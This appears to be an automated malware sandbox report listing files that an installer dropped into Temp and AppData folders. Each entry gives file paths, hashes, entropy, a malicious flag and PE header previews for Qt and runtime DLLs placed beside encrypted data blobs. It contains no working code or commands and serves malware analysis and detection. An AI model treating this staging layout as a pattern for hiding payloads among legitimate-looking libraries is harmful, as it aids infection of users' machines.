C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Core.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6133880
Entropy (8bit):	6.6556462442857764
Encrypted:	false
SSDEEP:	98304:8TjAe4iOtBel1xJsv6tWKFdu9C0eo74QerqfAR:8TjAetoBEJsv6tWKFdu9C017derqfAR
MD5:	8C735052A2D4E9B01B0E028F0C20F67C
SHA1:	B72BDE11DE3310A495DD16520362F4ADBF21717A
SHA-256:	D751AB0357F71586B1793CE4166295ABA085334647D6E3FFCD49287A801273E7
SHA-512:	0BBD920E1B48361C7F3E1540DDB12FA6C9146BFE36E13EBA2B2E6CA8BF3AD961D88121C6F70ECA6D9EA413900455E696F7233C5BB54415CA7D2C9C1C0D4C1FB3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............]...]...]..@]...]...\...]9l.]...]...\...]...\...]...\...]..\...]..\...]...]...]0..\...]0..\W..]0..\...]5.,]...]..D]...]0..\...]Rich...]................PE..d.....n].........." ......-.../.....$",......................................@^......-^...`...........................................S.......Z.......^......`[..q....].x.....^.."....L.T.....................L.(...p.L..............................................text.....-.......-................. ..`.rdata....,.......,...-.............@..@.data.........Z..P....Z.............@....pdata...q...`[..r....Z.............@..@.tls..........]......T].............@....gfids..,.....]......V].............@..@.rsrc.........^......X].............@..@.reloc..."....^..$...^].............@..B................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Gui.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6494840
Entropy (8bit):	6.661788186831622
Encrypted:	false
SSDEEP:	49152:Olbw69/oyRlQ3bseHmQL7cE6Vvz4IBeEsBvf6MGde7l8UkqolD/SrneTbfrh4y+8:Olbw6a6GpcZsBv6szezn9IPRs9
MD5:	34893CB3D9A2250F0EDECD68AEDB72C7
SHA1:	37161412DF2C1313A54749FE6F33E4DBF41D128A
SHA-256:	CA8334B2E63BC01F0749AFEB9E87943C29882131EFE58608EA25732961B2DF34
SHA-512:	484E32832D69EC1799BD1BCC694418801C443C732ED59ECD76B3F67ABF0B1C97D64AE123728DFA99013DF846BA45BE310502EF6F8DA42155DA2E89F2A1E8CB2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ke[...5...5...5..\|....5......5.4Z6...5.4Z1...5.4Z4...5.4Z0...5.\|f4...5..Z4...5...4...5..Z1...5..Z0.W.5..Z5...5..Z...5.......5..Z7...5.Rich..5.................PE..d...>.n].........." .....f9...)......Z9.......................................c.......c...`.........................................`.C.<.....\.@.....c......._.<.....c.x.....c..,..0r?.T...................(s?.(....r?...............9../...........................text...be9......f9................. ..`.rdata...b$...9..d$..j9.............@..@.data........]..T....].............@....pdata..<....._......"_.............@..@.gfids..4....`c.......b.............@..@.tls.........pc.......b.............@....rsrc.........c.......b.............@..@.reloc...,....c.......b.............@..B................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Network.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314424
Entropy (8bit):	6.382115484562211
Encrypted:	false
SSDEEP:	24576:txQym4jK56LNWz/m7iNBd3ol84iKiEanXC:t1mrCNxiNBulliKiEaXC
MD5:	FE5ED4C5DA03077F98C3EFA91ECEFD81
SHA1:	E23E839EC0602662788F761EBE7DD4B39C018A7F
SHA-256:	D992AAEB21CB567113126C2912CF75E892C8E3EAD5D50147A11ABE704B9E2E2B
SHA-512:	22514732A0EDF8FC2B8770139599132429080B86D2844143D21BB834CBDDAAA077D763969960E39E2050A69493C1AAE191600E5DF6107BDE90FAE589A054F071
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y?1.8Qb.8Qb.8Qb.@.b.8Qb.fRc.8Qb.fUc.8Qb.fPc.8Qb.fTc.8Qb.ZPc.8Qb.fPc.8Qb.8Pb`;Qb.fTc.8Qb.fQc.8Qb.f.b.8Qb.8.b.8Qb.fSc.8QbRich.8Qb........PE..d.....n].........." .........z...............................................`............`......................................... ...._...#..,....0....... ..T.......x....@.........T......................(...0................... ............................text...7........................... ..`.rdata...=.......>..................@..@.data....4......."..................@....pdata..T.... ......................@..@.gfids..4...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5PrintSupport.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	324216
Entropy (8bit):	6.424811123526958
Encrypted:	false
SSDEEP:	6144:n5BVjwbCL85ofdeA2aqWs+41FwneMKAaol1cafGR27M1ffqp+1eszZnDy4SA:nBjwE8aVK
MD5:	D0634933DB2745397A603D5976BEE8E7
SHA1:	DDEC98433BCFEC1D9E38557D803BC73E1FF883B6
SHA-256:	7D91D3D341DBBA568E2D19382E9D58A42A0D78064C3AD7ADFE3C7BB14742C2B1
SHA-512:	9271370CD22115F68BD62572640525E086A05D75F5BC768F06E20B90B48A182F29A658A07099C7BC1E99BF0FFCF1229709524E2AF6745D6FED7B41C1ADDD09F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.....}...}...}.k.}...}.M.\|...}.M.\|...}.M.\|...}.M.\|...}.q.\|...}zM.\|...}...}...}zM.\|...}zM.\|...}.Mc}...}...}...}zM.\|...}Rich...}................PE..d....n].........." .........................................................0.......H....`..........................................M...p.......................&......x.... ..@.......T.......................(.......................P"...........................text............................... ..`.rdata..............................@..@.data...............................@....pdata...&.......(..................@..@.gfids..4...........................@..@.tls................................@....rsrc...............................@..@.reloc..@.... ......................@..B................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Widgets.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5539448
Entropy (8bit):	6.61165878012579
Encrypted:	false
SSDEEP:	98304:oSIq7lPpagrGUtPm3qBF+1jIJJAi+eVq8:oSI8hagrGUtPm3KMRIL+e/
MD5:	C502BB8A4A7DC3724AB09292CD3C70D6
SHA1:	FF44FDDEEC2D335EC0EAA861714B561F899675FD
SHA-256:	4266918226C680789D49CF2407A7FEC012B0ED872ADAFB84C7719E645F9B2E6D
SHA-512:	73BEF89503CE032FBA278876B7DAB9EAC275632DF7A72C77093D433C932272DA997E8FBEB431A09D84BAAC7B2AB2E55222FF687893311949A5603E738BFA6617
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....b..b..b.v.H.wb.D<.\|b.D<.ub.D<.{b.D<.hb....ub..<.zb..b.no..<..b..<.~b..<$.~b..bL.~b..<.~b.Rich.b.................PE..d.....n].........." ......3... .......3.......................................T......4U...`......................................... .D.TQ..t>M......@T.......P..e...pT.x....PT.... =@.T....................>@.(....=@...............4..h...........................text.....3.......3................. ..`.rdata........4.......4.............@..@.data........P..~....O.............@....pdata...e....P..f...rP.............@..@.gfids..4.... T.......S.............@..@.tls.........0T.......S.............@....rsrc........@T.......S.............@..@.reloc......PT.......S.............@..B................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\StarBurn.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1505376
Entropy (8bit):	6.361832549375939
Encrypted:	false
SSDEEP:	24576:NbKpao+9Uybarjs1FHw9guJfkTK39MOCRZnVVWjk+amEObzznf9:NbKpaGEw9diEjkuEObzznf9
MD5:	41E19BA2364F2C834B2487E1D02BB99A
SHA1:	6C61D603DDDFE384A93AD33775B70681D0A396D9
SHA-256:	C040A25377028B0C28DB81A012DE786C803A0E9D6F87CE460335A621D31F5340
SHA-512:	6EBF4A9E80F16C6A03FF357D2DA9A34A4227BFD65EB66D1D335349A77BA066D069BA0D47D46229B3C77B59052C42D388678662F970B418D8CC3CFB1223427D8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ho..ho..ho.....ho.....ho.....ho..hn.{ho......ho.....Zho.....ho.....ho......ho......ho......ho.Rich.ho.................PE..d...u.NK.........." .........2...............................................P............@.............................................C6......d............p..$u......`.... ......`...............................................X................................text............................... ..`.data............^..................@....pdata..$u...p...v..................@..@.idata..............................@....rsrc...............................@..@.reloc...&... ...&..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\dcfa

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	4543241
Entropy (8bit):	7.9608931519984845
Encrypted:	false
SSDEEP:	98304:OO7SdW9HUJrRH13FneWNNrxg3XXnD8hrXI678K35sXYIt:52W9OrbVzHrG0T/78K35zIt
MD5:	456596683DAD1217C76D8C0F47B5CFBC
SHA1:	001AE3F937AA75AD2175289C6E8F09561A1CBB35
SHA-256:	A7E578D0F7A5D522E4B4E62864F77CBB1830DC7E7026C9EE0B5F6FA7156C727F
SHA-512:	537420007A4985F2DEB4B2A48AF1BA61CF8CC112359EC1CDBD02DFB8E958AB5AB4EC302CD0698A14D4560AFE6C23627D1D4D080EAC9DAA7CB5EDC7259CB73591
Malicious:	false
Preview:	.t.bs..^Gs.dN...n.......NMLN..PxS.W......Z.Q.I...K.^Q.qlxs...FXT..PN.o.v..N.x.......aq[X.JCuX.P.SRa...cg...U.U\.]`do^jg^..RY.vLX..J.Eq......QnuXU..G.XN.R[....P.YD..m.Q....M.t.b..LnGm..R.ES..e..l._A.Q.e.TDF.s..X.sXBV...QQ.b..Y....G.of....SlexH.l......J..VC.jk]jl.I.g..A...Yl..b]e.....x.of._.]..E_.D.Pwg`x.L.r...r.R.....rZo..F]gv.......AgkL.cy.FmrhnkH....P...I.ACj..PhteI..Yq...vn.Z_..v..oFK.Ng........iE`..^Y..q.s...e....UX..l...h..UB.cf...V...l[wO.GhDsbu.......mF...wI.Og_[.ZO.E..kwn.X_...`Vc_.qQ..h.H...r.fLP.n.PAr.].G..B....U..Y.......S.k.dh...u..FN..b..[..d..WC..p.FM.....q.k.F..bGS....Ij....Lh\h.o_.lU.....et.p...iF...Z.D.....Xu.ylnoCPI...C.sB.yo.NRf.n...._k.tuoa._..G..jTx.U.I..L...PQm._.k....rA.Yk.LV.`..A.K..e....X..BFR.dk.Kk.E..bC.WdJ.bYDu....P.eD..\f..GQ`Pgv.c..tn.DG.o..Ey.g\T.E..t.J.`...G....K..`.u]l.aaV.REyBRF.....N..O..t.T\..uuq..u..d..rG...E.R..fs..jj.....VOgA.D...y..Uu`.cIJ.P..B..]N......XQ.aH..Ln]Z.x.t.m..s..].._..y..[.tuV..\....H.g.t...VK.T.l....mn\..Z.m.X_U.^V.f.S.lII.BU.n.h....

C:\Users\user\AppData\Roaming\MonitorBrowser2\msvcp140.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	571312
Entropy (8bit):	6.492350759123951
Encrypted:	false
SSDEEP:	12288:Rsjw3shF+jss1I8CgEWTe5+YMCMGz2MMY5U489wiyaf+QEKZm+jWodEEVksLd:Rs/5U4RBaf+QEKZm+jWodEECsL
MD5:	7DB24201EFEA565D930B7EC3306F4308
SHA1:	880C8034B1655597D0EEBE056719A6F79B60E03C
SHA-256:	72FE4598F0B75D31CE2DC621E8EF161338C6450BB017CD06895745690603729E
SHA-512:	BAC5729A3EB53E9BC7B680671D028CABEF5EA102DFAA48A7C453B67F8ECB358DB9F8FB16B3B1D9EA5A2DFF34F459F6AC87F3A563C736D81D31048766198FF11E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T4...U...U...U...'...U...-8..U...U...U..p/...U..p/...U..p/...U..p/...U..p/...U..p/T..U..p/...U..Rich.U..........PE..d...,pd..........." ... .H...b.......3..............................................r.....`A.........................................H..h...."..,...............8:.......'......8.......p...........................@...@............`...............................text....G.......H.................. ..`.rdata..b....`.......L..............@..@.data...P:...@.......(..............@....pdata..8:.......<...F..............@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\vcruntime140.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\vcruntime140_1.dll

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38304
Entropy (8bit):	6.3923853431578035
Encrypted:	false
SSDEEP:	768:Xhh4pTUUtmUwqiu8oSRjez6SD7GkxZYj/9zLUr:xJ9x70GkxuZz2
MD5:	75E78E4BF561031D39F86143753400FF
SHA1:	324C2A99E39F8992459495182677E91656A05206
SHA-256:	1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E
SHA-512:	CE4DAF46BCE44A89D21308C63E2DE8B757A23BE2630360209C4A25EB13F1F66A04FBB0A124761A33BBF34496F2F2A02B8DF159B4B62F1B6241E1DBFB0E5D9756
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......................h.........G.........:...h.......h.......h.......h.......h.+.....h.......Rich............................PE..d................." ... .:...6.......A..............................................B.....`A.........................................m.......m..x....................n...'......D....c..p...........................`b..@............P..`............................text....9.......:.................. ..`.rdata..."...P...$...>..............@..@.data................b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..D............l..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\vechpt

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	15745
Entropy (8bit):	6.185378376185804
Encrypted:	false
SSDEEP:	384:l/Yzs6zZ+ic3FE2IUZmwKy8mfOCdLnryfBsFhs:lgzsITfkmwKy8ZhKFW
MD5:	DD899CA13E5BEF55BCEA07E167DA891B
SHA1:	E883F0240F127520486F063B033FB34FA2DFE5C1
SHA-256:	A818D6FA8CADDAA608345EA40B75073A7C98637161794918566E2DDEEEDE47E7
SHA-512:	E38437899FCC433EF89A04C6A68684EA5110181AF48A4699836939CF167D0C1FE7932432518445E90ACBCBC151EE324D77DE064147D97FDEDF6ECABAAC788C06
Malicious:	false
Preview:	.m.c.T^YvvPEcE..l.avS...P.._..h..Dlx.hCl.fu......Ih.f...B..JIR..pG.c.G.iaX.g.d..T...u\.r..].Uu.V...k..R.WXwsZx.QMQ..S.r..^...ZZ.b.a...n`jfH.`]SKoUQw..D.......s...tY..OT.b..lENXo.p...Hd.RWjEw.......Y..u.C.......rp.a.V.oN\c_UC.ox.Q......X....YwX..tkn.V...g.W^c._B....EdgW.gu.YN..ICA.p.....Z.o.ev.N..tH....pyyLt.T..A.XHk.duaxpkY.AUT.....gp.TCn..Sxjm...EM...Cb[U.t.ZGlC.c.dT.mYl...R.nJ.....drk..qLuv.y.q..COa.....D....hU._..e.....^]..C.X..IP.Z.BXf.X.b....y.QwB.txZ..^B.....Mp\j...Z.il.f...UQ.x.e`.^.....Mw.Z....ud[oVNa..d..o.HJsP.wY...Af...A.M.Ur.X..S.i[j..VE...I..iiqH...s^...B.I..ZV....`rUNP.....n...JS..Qq..R..Qvar...Z.Ce..Vac[S...I.[.D.....D.qWS.k.V]vG.EVLk..v.XwoA....w..lE.n.m..UPm.Iai.u.......kAhf.Q.n.t.g.v.^P..c._.hC\b.cpc..L.......o...C`.`Q.O..NF.[.V.e..U\hj.X.u.ZHnL.f.....SAm.G..X]..X.FJ....K.....j[..e.ndEI..cDq..bB.a.fDX...YK....Tm.rAK.......I......HotwdB..K.v^qM.mM.`Rc..LI..LKR.......Rv.L....qO....`l..vG.Vjt.N...If[..A..`....h...t.t]...b..re.fm.PqOik.faF.U.J..X..FKG.\H.B..I..WXA._..R.N.

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1266616
Entropy (8bit):	6.275567294044985
Encrypted:	false
SSDEEP:	12288:RWiPQmboElHjsxc93LwnfXlP0CT7T4ir7XFXTqlj02F:5Qrat3knTvT4yDpqlj/F
MD5:	B84DFABE933D1160F624693D94779CE5
SHA1:	AC0133C09708FE4A3C626E3BA4CDF44D3A0E065F
SHA-256:	588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
SHA-512:	EEAEEF8D6B5FA02DEDF9818BABAA4B5FFDB87300521883AA290289DCC720B3D543279085ED3FC649B74654143E678502E56EB3F92C4BAF53C075977DE33C1B0E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........s..G..CG..CG..C.n.CF..C.n.BX..C.n.BM..C.n.BC..C.n.BA..C.L.BF..C.L.BM..CSy.BO..CNjpCS..CG..Cu..C..(CD..C.L.BQ..C.L.BM..C.o.B`..C.o.CF..CG.tCF..C.o.BF..CRichG..C........................PE..d....~.e.........."....#.....<.................@.....................................y....`.............................................................8........>...(...+...`..................................(...@...@............0...)...........................text............................... ..`.rdata..0....0......................@..@.data....w.......L..................@....pdata...>.......@...D..............@..@.rsrc...8...........................@..@.reloc.......`......................@..B........................................................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (593), with CRLF line terminators
Category:	dropped
Size (bytes):	2592
Entropy (8bit):	3.733087875999243
Encrypted:	false
SSDEEP:	48:y+03qHhhOFtDiXRpne1AWe0CuqaUFJwa0wSRycl8T843sj1RmGhiicABriwiT9AW:X+mXvn6je0Lq910woycRoW1RxhWariwM
MD5:	A860D531EB8684C48346843C04093EF3
SHA1:	E0928FE134190BC93D71F56996101E0A4DB0E1B9
SHA-256:	2967F7B71BC3C85C05981824D07FE267F3F281DB944588243B99EC98FF3AA81E
SHA-512:	C7440CD94338D0EC4EF9CF1F9DCFBACCCF47AB7D8234D13734569FD27D4D527E159F539AEB1FC42AEBBD59A10EEF6B3876715DEC8D157954043F3F67AC3E79BB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".C.e.r.m.e.t.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.5.2.4.d.4.2.a.a.-.9.5.2.3.-.4.d.c.9.-.9.8.9.a.-.6.8.a.b.a.6.f.2.b.0.d.b.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.F.F.7.4.B.F.B.8.-.7.5.D.A.-.4.0.1.D.-.A.D.D.3.-.9.B.E.5.A.8.F.C.3.8.5.A.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".D.r.i.v.e.i.n.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.2. .x.8.6. .M.i.n.i.m.u.m. .R.u.n.t.i.m.e. .-. .1.1...0...5.0.7.2.7.". .D.e.s.c.r.i.p.t.i.o.n.=.".C.a.u.t.

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Helicoid.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	184224
Entropy (8bit):	6.538471774349857
Encrypted:	false
SSDEEP:	3072:wDdsX3PlLDT5lthQ8T28MmDXjTwDgO6IGhua1PY98HwfAg0FuDQ1KYm3VbzhyU2X:NlDT5lth3ZDj8DF/Ghua1oxAOUcB3VBA
MD5:	A9C5977784DAF8CEBE8408A8B6DB3FBE
SHA1:	8AE8D67007CDCA9ACF96681FFA6200E5847972DE
SHA-256:	63F5A34563B62DE3DFFA57401D7225F4687933CEF250B78B995EEE813C862FAD
SHA-512:	886FBEA2C959CE4245185D1DCEC3EFCFBB50A71840C964D4FD8E0A46F7FBF8AFBF7445BC2D892789F25124B862912FB0C3556C5004A7E6DDB4EE13B87CF58A65
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S.jv=.jv=.jv=.~.>.gv=.~.8..v=.~.9.\|v=...9.{v=...>.~v=...8.#v=.~.<.}v=.jv<..v=...4.vv=...=.kv=....kv=.jv..kv=...?.kv=.Richjv=.........................PE..L...A.3`.........."!.........2.......m...................................................@.................................<...x.......p.......................H...xo..p....................p.......o..@............................................text.............................. ..`.rdata..............................@..@.data...............................@....rsrc...p...........................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Core.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6133880
Entropy (8bit):	6.6556462442857764
Encrypted:	false
SSDEEP:	98304:8TjAe4iOtBel1xJsv6tWKFdu9C0eo74QerqfAR:8TjAetoBEJsv6tWKFdu9C017derqfAR
MD5:	8C735052A2D4E9B01B0E028F0C20F67C
SHA1:	B72BDE11DE3310A495DD16520362F4ADBF21717A
SHA-256:	D751AB0357F71586B1793CE4166295ABA085334647D6E3FFCD49287A801273E7
SHA-512:	0BBD920E1B48361C7F3E1540DDB12FA6C9146BFE36E13EBA2B2E6CA8BF3AD961D88121C6F70ECA6D9EA413900455E696F7233C5BB54415CA7D2C9C1C0D4C1FB3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............]...]...]..@]...]...\...]9l.]...]...\...]...\...]...\...]..\...]..\...]...]...]0..\...]0..\W..]0..\...]5.,]...]..D]...]0..\...]Rich...]................PE..d.....n].........." ......-.../.....$",......................................@^......-^...`...........................................S.......Z.......^......`[..q....].x.....^.."....L.T.....................L.(...p.L..............................................text.....-.......-................. ..`.rdata....,.......,...-.............@..@.data.........Z..P....Z.............@....pdata...q...`[..r....Z.............@..@.tls..........]......T].............@....gfids..,.....]......V].............@..@.rsrc.........^......X].............@..@.reloc..."....^..$...^].............@..B................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Gui.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6494840
Entropy (8bit):	6.661788186831622
Encrypted:	false
SSDEEP:	49152:Olbw69/oyRlQ3bseHmQL7cE6Vvz4IBeEsBvf6MGde7l8UkqolD/SrneTbfrh4y+8:Olbw6a6GpcZsBv6szezn9IPRs9
MD5:	34893CB3D9A2250F0EDECD68AEDB72C7
SHA1:	37161412DF2C1313A54749FE6F33E4DBF41D128A
SHA-256:	CA8334B2E63BC01F0749AFEB9E87943C29882131EFE58608EA25732961B2DF34
SHA-512:	484E32832D69EC1799BD1BCC694418801C443C732ED59ECD76B3F67ABF0B1C97D64AE123728DFA99013DF846BA45BE310502EF6F8DA42155DA2E89F2A1E8CB2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ke[...5...5...5..\|....5......5.4Z6...5.4Z1...5.4Z4...5.4Z0...5.\|f4...5..Z4...5...4...5..Z1...5..Z0.W.5..Z5...5..Z...5.......5..Z7...5.Rich..5.................PE..d...>.n].........." .....f9...)......Z9.......................................c.......c...`.........................................`.C.<.....\.@.....c......._.<.....c.x.....c..,..0r?.T...................(s?.(....r?...............9../...........................text...be9......f9................. ..`.rdata...b$...9..d$..j9.............@..@.data........]..T....].............@....pdata..<....._......"_.............@..@.gfids..4....`c.......b.............@..@.tls.........pc.......b.............@....rsrc.........c.......b.............@..@.reloc...,....c.......b.............@..B................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Network.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314424
Entropy (8bit):	6.382115484562211
Encrypted:	false
SSDEEP:	24576:txQym4jK56LNWz/m7iNBd3ol84iKiEanXC:t1mrCNxiNBulliKiEaXC
MD5:	FE5ED4C5DA03077F98C3EFA91ECEFD81
SHA1:	E23E839EC0602662788F761EBE7DD4B39C018A7F
SHA-256:	D992AAEB21CB567113126C2912CF75E892C8E3EAD5D50147A11ABE704B9E2E2B
SHA-512:	22514732A0EDF8FC2B8770139599132429080B86D2844143D21BB834CBDDAAA077D763969960E39E2050A69493C1AAE191600E5DF6107BDE90FAE589A054F071
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
